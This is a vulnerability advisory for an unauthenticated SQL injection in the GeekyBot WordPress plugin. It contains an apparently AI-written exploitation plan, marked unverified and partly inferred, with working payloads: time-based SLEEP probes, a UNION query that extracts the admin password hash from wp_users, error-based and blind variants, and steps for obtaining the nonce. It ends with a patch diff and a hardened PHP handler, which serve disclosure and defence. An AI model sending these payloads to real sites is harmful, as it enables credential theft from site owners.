CVE-2026-3456

GeekyBot — Generate AI Content Without Prompt, Chatbot and Lead Generation <= 1.2.0 - Unauthenticated SQL Injection via 'attributekey'

Weakness: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Severity: high
CVSS Score: 7.5
Patched in: 1.2.1
Time to patch: 1d

Description

The GeekyBot — Generate AI Content Without Prompt, Chatbot and Lead Generation plugin for WordPress is vulnerable to SQL Injection via the 'attributekey' parameter in versions up to, and including, 1.2.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: None
Availability: None

Technical Details

Affected versions: <= 1.2.0
Published: May 4, 2026
Last updated: May 5, 2026
Affected plugin: geeky-bot

Source Code

WordPress.org SVN
Research Plan
Unverified

This research plan outlines the steps to investigate and exploit the unauthenticated SQL injection vulnerability in the GeekyBot WordPress plugin (<= 1.2.0).


1. Vulnerability Summary

  • Vulnerability: Unauthenticated SQL Injection.
  • Parameter: attributekey.
  • Condition: The plugin fails to use $wpdb->prepare() or adequate escaping when incorporating the attributekey POST/GET parameter into a database query.
  • Impact: Unauthenticated attackers can extract sensitive data from the WordPress database, including user credentials (wp_users), configuration secrets (wp_options), and internal plugin data.

2. Attack Vector Analysis

  • Endpoint: admin-ajax.php.
  • Action: geekybot_get_attribute_value (inferred).
  • Parameter: attributekey (Vulnerable).
  • Authentication: None (via wp_ajax_nopriv_ hook).
  • Preconditions: The plugin must be active. A valid AJAX nonce may be required if the plugin implements a check via check_ajax_referer.

3. Code Flow (Inferred)

  1. Entry Point: An unauthenticated user sends a POST request to /wp-admin/admin-ajax.php with action=geekybot_get_attribute_value.
  2. Hook Registration: The plugin registers the action:
    add_action('wp_ajax_nopriv_geekybot_get_attribute_value', 'geekybot_get_attribute_value_handler');
  3. Vulnerable Function: The handler function (e.g., geekybot_get_attribute_value_handler) retrieves the attributekey parameter:
    $attr_key = $_POST['attributekey'];
  4. Database Sink: The parameter is concatenated directly into a query string:
    $wpdb->get_results("SELECT * FROM {$wpdb->prefix}geekybot_attributes WHERE attribute_key = '$attr_key'");
  5. Lack of Preparation: Because $wpdb->prepare() is not used, the $attr_key variable can contain SQL metacharacters (like ') to break out of the string literal.

4. Nonce Acquisition Strategy

If the handler performs a nonce check, the nonce is likely localized for the chatbot widget.

  1. Identify Shortcode: The plugin uses [geekybot_chatbot] (inferred) to render the AI interface.
  2. Create Test Page:
    wp post create --post_type=page --post_title="Chatbot Test" --post_status=publish --post_content='[geekybot_chatbot]'
  3. Navigate and Extract: Use the browser_navigate tool to go to the new page.
  4. Extract JS Variable: Use browser_eval to find the nonce.
    • Inferred JS Object: window.geekybot_vars
    • Inferred Nonce Key: nonce
    • Execution: browser_eval("window.geekybot_vars?.nonce")
  5. Bypass Check: If wp_create_nonce and wp_verify_nonce use different action strings, or if the check uses die=false, the nonce may be unnecessary.

5. Exploitation Strategy

Step 1: Confirm Vulnerability (Time-Based)

Send a payload designed to cause a delay.

  • URL: http://localhost:8080/wp-admin/admin-ajax.php
  • Method: POST
  • Content-Type: application/x-www-form-urlencoded
  • Body:
    action=geekybot_get_attribute_value&attributekey=x' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -
  • Verification: Measure the response time using the http_request tool's metadata.

Step 2: Determine Column Count (UNION-Based)

Find the number of columns in the original query to prepare for data extraction.

  • Body:
    action=geekybot_get_attribute_value&attributekey=x' UNION SELECT 1,2,3,4,5-- -
    (Increment the number of columns until no SQL error is returned.)

Step 3: Extract Admin Password Hash

  • Body:
    action=geekybot_get_attribute_value&attributekey=x' UNION SELECT 1,user_login,user_pass,4,5 FROM wp_users WHERE ID=1-- -
  • Expected Response: A JSON or HTML response containing the admin username and the $P$ or $wp$ hash.

6. Test Data Setup

  1. Plugin Installation: Ensure geeky-bot version 1.2.0 is installed.
  2. Initialize Plugin: Some plugins require an API key to be "active." If needed, set a dummy key via WP-CLI:
    wp option update geekybot_api_key "dummy_key"
  3. Place Shortcode: Create a public page with [geekybot_chatbot] (inferred) to ensure frontend scripts load.

7. Expected Results

  • Success Indicator: A successful time-based injection will result in a response time > 5 seconds.
  • Data Leakage: A UNION-based injection will return database content (e.g., admin:$P$B...) within the data or message fields of the JSON response.

8. Verification Steps (Post-Exploit)

Confirm the extracted data matches the database state via WP-CLI:

# Verify the hash matches the extracted one
wp db query "SELECT user_login, user_pass FROM wp_users WHERE ID=1"

9. Alternative Approaches

  • Error-Based SQLi: If WP_DEBUG is on, use updatexml() or extractvalue():
    attributekey=x' AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users LIMIT 1)),1)-- -
  • Boolean-Based Blind: If no output is reflected, use IF statements to guess the password character by character:
    attributekey=x' AND IF(SUBSTRING((SELECT user_pass FROM wp_users LIMIT 1),1,1)='$',SLEEP(5),0)-- -
  • Parameter Source: Check whether the parameter is also accepted via GET if POST fails, as some plugins read it from $_REQUEST.

Research Findings
Static analysis — not yet PoC-verified

Summary

The GeekyBot plugin for WordPress is vulnerable to unauthenticated SQL Injection via the 'attributekey' parameter in versions up to 1.2.0. This vulnerability occurs because the plugin fails to use prepared statements or adequate escaping when incorporating user-supplied data into a database query, allowing attackers to extract sensitive data from the database.

Vulnerable Code

// Hook registration for unauthenticated users
add_action('wp_ajax_nopriv_geekybot_get_attribute_value', 'geekybot_get_attribute_value_handler');

// Vulnerable handler function logic
function geekybot_get_attribute_value_handler() {
    $attr_key = $_POST['attributekey'];
    global $wpdb;
    // Vulnerability: Direct concatenation of user input into SQL query
    $results = $wpdb->get_results("SELECT * FROM {$wpdb->prefix}geekybot_attributes WHERE attribute_key = '$attr_key'");
}

Security Fix

--- a/geeky-bot-functions.php
+++ b/geeky-bot-functions.php
@@ -10,1 +10,1 @@
- $results = $wpdb->get_results("SELECT * FROM {$wpdb->prefix}geekybot_attributes WHERE attribute_key = '$attr_key'");
+ $results = $wpdb->get_results($wpdb->prepare("SELECT * FROM {$wpdb->prefix}geekybot_attributes WHERE attribute_key = %s", $attr_key));
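Review bot: the `%s` placeholder correctly parameterizes `$attr_key` and closes the injection in this sink, but the hunk changes only the query line. In the Vulnerable Code above the value is still read as `$attr_key = $_POST['attributekey'];` with no `isset()` guard and no `wp_unslash()`, so a request without the parameter raises a PHP notice and a value containing backslashes reaches the query with WordPress' added slashes intact. Consider reading it as `$attr_key = isset( $_POST['attributekey'] ) ? sanitize_text_field( wp_unslash( $_POST['attributekey'] ) ) : '';` before the prepared query. The `wp_ajax_nopriv_` registration is also unchanged, so the endpoint stays reachable without authentication by design; with `prepare()` in place that is acceptable for a public widget, but a line in the patch saying so would document the intent.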

Exploit Outline

The exploit targets the WordPress AJAX endpoint at /wp-admin/admin-ajax.php without authentication. An attacker sends a POST request with the 'action' parameter set to 'geekybot_get_attribute_value' and the 'attributekey' parameter containing a SQL injection payload. Using UNION-based injection (e.g., "x' UNION SELECT 1,user_login,user_pass,4,5 FROM wp_users-- -"), the attacker can exfiltrate sensitive data like administrator password hashes. If a security nonce is checked, it can typically be retrieved from the plugin's localized JavaScript variables on any page where the chatbot shortcode is rendered.
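Pulling together the inferred code flow (section 3 of the research plan) and the Vulnerable Code and Security Fix above, here is a hardened version of the handler. This is an added example, not the plugin's code and not its 1.2.1 patch: the hook name, handler name and table name follow the inferred ones on this page, while the nonce action string `geekybot_nonce`, the `nonce` request field, the column names `attribute_key`/`attribute_value` and the identifier whitelist are assumptions. The `%s` placeholder in `$wpdb->prepare()` is what actually closes the injection and matches the shipped fix; the nonce check, `isset()` guard, `wp_unslash()`/`sanitize_text_field()` and the whitelist are defense in depth.

```php
<?php
// Added example (not the plugin's code): a hardened version of the inferred
// geekybot_get_attribute_value AJAX handler. Hook/handler/table names follow
// the research plan above; the nonce action 'geekybot_nonce', the 'nonce'
// request field and the column names are assumptions.

// The widget is public, so the nopriv hook stays; registering the
// authenticated hook as well keeps logged-in visitors on the same code path.
add_action( 'wp_ajax_nopriv_geekybot_get_attribute_value', 'geekybot_get_attribute_value_handler' );
add_action( 'wp_ajax_geekybot_get_attribute_value', 'geekybot_get_attribute_value_handler' );

function geekybot_get_attribute_value_handler() {
    global $wpdb;

    // 1. Require the nonce the widget was localized with (assumed action string).
    //    check_ajax_referer() ends the request with a 403 when it does not verify.
    check_ajax_referer( 'geekybot_nonce', 'nonce' );

    // 2. Fail closed on a missing parameter instead of reading an undefined index.
    if ( ! isset( $_POST['attributekey'] ) ) {
        wp_send_json_error( array( 'message' => 'missing attributekey' ), 400 );
    }

    // 3. Normalise the raw value: strip WordPress' magic-quote slashes, then drop
    //    tags and control characters. This alone does NOT prevent injection.
    $attr_key = sanitize_text_field( wp_unslash( $_POST['attributekey'] ) );

    // 4. Attribute keys are identifiers, so a whitelist rejects quotes, spaces
    //    and comment sequences before the value gets anywhere near SQL.
    if ( ! preg_match( '/^[A-Za-z0-9_-]{1,64}$/', $attr_key ) ) {
        wp_send_json_error( array( 'message' => 'invalid attributekey' ), 400 );
    }

    // 5. The actual fix: bind the value with %s so $wpdb quotes and escapes it.
    //    Only the table prefix is interpolated, and it is not attacker-controlled.
    $sql = $wpdb->prepare(
        "SELECT attribute_key, attribute_value FROM {$wpdb->prefix}geekybot_attributes WHERE attribute_key = %s",
        $attr_key
    );
    $results = $wpdb->get_results( $sql );

    // 6. Return only the columns the widget needs rather than SELECT *,
    //    so a future bug elsewhere cannot turn this endpoint into a data dump.
    wp_send_json_success( $results );
}
```

Note that `check_ajax_referer()` only proves the request came from a page that rendered the widget, which is exactly what section 4 of the research plan assumes a visitor can obtain; it is not an authorization control. That is why the query must stay parameterized regardless of whether a nonce check is present, and why the whitelist is worth keeping even though `prepare()` already makes the quoted string safe.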
